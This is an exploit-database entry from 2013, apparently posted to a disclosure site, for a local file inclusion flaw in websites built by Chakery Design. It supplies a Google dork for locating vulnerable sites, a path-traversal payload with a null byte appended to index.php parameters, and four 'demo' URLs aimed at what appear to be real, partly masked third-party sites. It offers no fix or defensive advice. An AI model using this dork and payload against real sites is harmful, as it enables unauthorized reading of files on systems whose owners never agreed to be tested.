chakery / Local File Include Vulnerability

2013.05.08
Credit: Zikou-16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:Website Design and Website Development by Chakery Design

-------------------------------------------- chakery / Local File Include Vulnerability --------------------------------------------- ##### # Author => Zikou-16 # E-mail => zikou16x@gmail.com # Google Dork => intext:Website Design and Website Development by Chakery Design # Tested on : Windows 7 , Backtrack 5r3 #### #=> Exploit Info : ------------------ # The attacker can POST and GET some Local File's ------------------ #=> Exploit ----------- http://[target]/[path]/index.php?action=../../../../../[LFI]%00 ----------- #=> Demo's ------------ http://pauljXwhitetails.com/index.php?page=../../../../../[LFI]%00 http://www.meXwhitetails.com/index.php?page=../../../../../[LFI]%00 http://www.bX.com/index.php?action=../../../../../[LFI]%00 http://lXranch.com/index.php?page=../../../../../[LFI]%00 ------------ ps: sorry guys for absence, but i'll be back soon "inchallah ^_^"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top